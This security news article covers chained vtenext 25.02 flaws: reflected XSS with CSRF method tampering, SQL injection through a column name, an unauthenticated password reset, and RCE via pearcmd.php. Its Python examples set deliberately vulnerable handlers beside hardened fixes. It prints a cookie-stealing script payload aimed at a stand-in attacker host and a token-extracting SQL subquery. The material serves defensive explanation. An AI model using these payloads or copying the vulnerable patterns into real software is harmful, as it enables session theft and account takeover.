Three distinct unauthenticated vectors enable attackers to bypass authentication and ultimately achieve remote code execution (RCE) on the target server.
Although version 25.02.1 silently patched the most severe vector, the remaining issues still leave every deployment exposed. Administrators are strongly urged to update immediately and to review the affected endpoints.
The chained vulnerabilities in Vtenext 25.02 can be grouped into three authentication-bypass vectors.
Each requires progressively less user interaction:
| Vector # | Primary Flaw | Secondary Flaws | User Interaction Required | Authentication Gain |
|---|---|---|---|---|
| 1 | Reflected XSS via POST (improper sanitization) | CSRF bypass (HTTP method tampering), session leak | Yes | Arbitrary user session hijack |
| 2 | Reflected XSS via POST | CSRF bypass, SQL injection | Yes | Extraction of password reset token |
| 3 | Arbitrary password reset (missing token validation) | N/A | No | Full account takeover (including admin) |
The first vector exploits a reflected XSS in HomeWidgetBlockList.php, where widget IDs taken from attacker-supplied JSON are echoed back unsanitized in a response served as text/html, so the browser renders them as markup.
Attackers inject JavaScript payloads to exfiltrate the victim's session cookie, bypassing the HttpOnly flag through an information-disclosure flaw in the Touch module.
By resending the request as a GET instead of a POST, they circumvent the CSRF token check entirely. This sequence enables session hijacking and full authentication bypass with minimal effort.
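The two server-side mistakes behind Vector 1, shown side by side in an added example that is not vtenext code: a CSRF check that only runs on POST (so the same parameters sent as GET skip it), and caller-controlled JSON echoed back in a text/html body. The handler names, the `widgets` parameter, the token scheme and the attacker payload are assumptions for the illustration.

```python
"""Added example, not vtenext code: a CSRF check that runs only on POST is
defeated by resending the same request as GET, and echoing caller-controlled
JSON back with a text/html content type turns that request into reflected XSS.
Function names, the 'widgets' parameter and the token scheme are assumptions."""
import json
import secrets

# Per-session CSRF token; in a real application this lives in the server-side session.
SESSION_CSRF_TOKEN = secrets.token_hex(16)

# Constructed attacker payload: a widget "ID" that is really a script tag.
XSS_PAYLOAD = json.dumps(
    ["<script>fetch('https://attacker.invalid/?c='+document.cookie)</script>"]
)


def vulnerable_widget_list(method, params, csrf_token=None):
    """Validates the CSRF token on POST only, then reflects the IDs as HTML."""
    if method == "POST" and csrf_token != SESSION_CSRF_TOKEN:
        return 403, "text/html", "invalid csrf token"
    widget_ids = json.loads(params.get("widgets", "[]"))
    body = "".join(f"<div class='widget'>{w}</div>" for w in widget_ids)
    return 200, "text/html", body


def hardened_widget_list(method, params, csrf_token=None):
    """Checks the token on every method, validates the IDs and answers as JSON."""
    if not csrf_token or not secrets.compare_digest(csrf_token, SESSION_CSRF_TOKEN):
        return 403, "application/json", json.dumps({"error": "invalid csrf token"})
    try:
        widget_ids = json.loads(params.get("widgets", "[]"))
    except json.JSONDecodeError:
        return 400, "application/json", json.dumps({"error": "malformed json"})
    if not isinstance(widget_ids, list) or not all(isinstance(w, int) for w in widget_ids):
        return 400, "application/json", json.dumps({"error": "widget ids must be integers"})
    # A browser will not execute script out of an application/json body.
    return 200, "application/json", json.dumps({"widgets": widget_ids})


if __name__ == "__main__":
    # Method tampering: the POST is rejected, the identical GET is reflected as HTML.
    print(vulnerable_widget_list("POST", {"widgets": XSS_PAYLOAD}))
    print(vulnerable_widget_list("GET", {"widgets": XSS_PAYLOAD}))
    print(hardened_widget_list("GET", {"widgets": XSS_PAYLOAD}))
    print(hardened_widget_list("POST", {"widgets": "[1, 2]"}, SESSION_CSRF_TOKEN))
```

The hardened version applies the token check before it looks at the method at all; tying CSRF protection to the request method is what made the tampering possible. Serving the response as application/json with validated integer IDs removes the reflection sink independently of the CSRF fix.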
Similar to Vector 1, the second chain begins with reflected XSS and CSRF bypass but adds a SQL injection in modules/Fax/EditView.php.
Although prepared statements are used, they can only bind values, not identifiers, and the user-controlled fieldname parameter is interpolated directly into the query text as a column name.
By injecting subqueries, attackers extract password reset tokens from vte_userauthtoken. Possession of the token allows an attacker to reset any user’s password and log in as that account.
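An added example (not vtenext code) of why binding the record ID does nothing for an interpolated column name: the subquery supplied as `fieldname` is evaluated in place of the column and returns a row from the token table. It uses an in-memory SQLite database with a constructed schema; the table names echo the article, but the column names and data are assumptions.

```python
"""Added example, not vtenext code: a prepared statement whose column
identifier is interpolated from user input. The record id is bound safely,
but the identifier position accepts a subquery that reads another table.
Schema, column names and sample rows are constructed for the illustration."""
import sqlite3


def build_db():
    """Constructed schema: a fax record table and a reset-token table."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE vte_fax (id INTEGER PRIMARY KEY, subject TEXT, recipient TEXT);
        CREATE TABLE vte_userauthtoken (user_id INTEGER, token TEXT);
        INSERT INTO vte_fax VALUES (1, 'Quarterly report', 'Alice');
        INSERT INTO vte_userauthtoken VALUES (1, 'constructed-reset-token-0001');
    """)
    return con


def vulnerable_lookup(con, fieldname, record_id):
    """Only record_id is a bound parameter; fieldname lands in the SQL text."""
    sql = f"SELECT {fieldname} FROM vte_fax WHERE id = ?"
    row = con.execute(sql, (record_id,)).fetchone()
    return row[0] if row else None


# Allow-list of column names the endpoint is permitted to read.
ALLOWED_FIELDS = frozenset({"subject", "recipient"})


def hardened_lookup(con, fieldname, record_id):
    """Rejects any identifier outside the allow-list before building the query."""
    if fieldname not in ALLOWED_FIELDS:
        raise ValueError(f"unknown field: {fieldname!r}")
    sql = f'SELECT "{fieldname}" FROM vte_fax WHERE id = ?'
    row = con.execute(sql, (record_id,)).fetchone()
    return row[0] if row else None


# Constructed attacker input for the fieldname parameter: a scalar subquery.
INJECTED_FIELDNAME = "(SELECT token FROM vte_userauthtoken WHERE user_id = 1)"

if __name__ == "__main__":
    db = build_db()
    print(vulnerable_lookup(db, "subject", 1))            # legitimate use
    print(vulnerable_lookup(db, INJECTED_FIELDNAME, 1))   # token leaks
    try:
        hardened_lookup(db, INJECTED_FIELDNAME, 1)
    except ValueError as err:
        print("rejected:", err)
```

No quoting or escaping trick fixes this class of bug; the identifier has to be matched against a fixed list of known columns, as the hardened function does, because the database driver offers no placeholder for identifiers.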
The most critical vector requires no user interaction. The change_password action of the hub/rpwd.php endpoint accepts arbitrary user_name and confirm_new_password parameters and never validates a reset token.
Because the change logic is invoked with skipOldPwdCheck set to true, the current password is not required either, so any account's password can be overwritten directly, giving an unauthenticated attacker immediate administrative access.
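The missing check in Vector 3, as an added example that is not vtenext code: a change_password handler that resets whichever account the request names and lets the caller opt out of the old-password check, beside one that requires a live, single-use reset token for that user and ignores any skip flag from the request. Function names, the storage layout, the `token` parameter and the PBKDF2 hashing are assumptions.

```python
"""Added example, not vtenext code: a password-reset action that trusts
user_name / confirm_new_password and a request-supplied skipOldPwdCheck,
beside one that demands a valid, unexpired, single-use reset token.
Names, storage layout and the hashing scheme are assumptions."""
import hashlib
import os
import secrets
import time


def hash_password(password, salt=None):
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt, digest


# Constructed user table: user_name -> (salt, pbkdf2 digest)
USERS = {"admin": hash_password("original-admin-password")}


def verify_password(user_name, password):
    salt, digest = USERS[user_name]
    return secrets.compare_digest(hash_password(password, salt)[1], digest)


def vulnerable_change_password(params):
    """Resets whichever account the request names; no token is ever checked."""
    user = params.get("user_name")
    if user not in USERS:
        return False
    if params.get("skipOldPwdCheck") != "true":
        # The old-password check would sit here, but the caller can opt out of it.
        return False
    USERS[user] = hash_password(params["confirm_new_password"])
    return True


class ResetTokens:
    """Server-side store of reset tokens: user_name -> (token, expiry time)."""

    def __init__(self, ttl_seconds=900):
        self.ttl = ttl_seconds
        self._tokens = {}

    def issue(self, user_name):
        token = secrets.token_urlsafe(32)
        self._tokens[user_name] = (token, time.time() + self.ttl)
        return token

    def consume(self, user_name, presented):
        """True once, for the right user, with the right unexpired token."""
        entry = self._tokens.get(user_name)
        if entry is None:
            return False
        token, expiry = entry
        if time.time() > expiry or not secrets.compare_digest(token, presented):
            return False
        del self._tokens[user_name]  # single use
        return True


def hardened_change_password(params, store):
    """Only the holder of a live reset token for user_name may set its password."""
    user = params.get("user_name")
    token = params.get("token", "")
    new_pw = params.get("confirm_new_password", "")
    if user not in USERS or len(new_pw) < 12:
        return False
    # skipOldPwdCheck from the request is deliberately ignored: the token is the authorisation.
    if not store.consume(user, token):
        return False
    USERS[user] = hash_password(new_pw)
    return True
```

Whether the old-password check is skipped should be decided by the server from the state of the flow (a reset token was just consumed), never from a parameter the client sends; binding the token to the user_name also stops a token issued for one account from resetting another.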
Once authenticated, attackers can achieve RCE through pearcmd.php, which can be leveraged to write and execute arbitrary PHP code if PEAR is installed on the server.
The researcher repeatedly attempted responsible disclosure from May 28 to July 13, 2025, but received no meaningful response until after public notification.
On July 24, version 25.02.1 silently patched Vector 3; Vtenext has since acknowledged missed communications due to spam filtering.
However, because that release addresses only Vector 3, Vtenext installations worldwide still face exposure from Vectors 1 and 2. Upgrading immediately to version 25.02.1 or later is imperative, and a comprehensive security review of custom modules and exposed endpoints is recommended.
The post Multiple vtenext Flaws Allow Authentication Bypass and Remote Code Execution appeared first on Cyber Security News.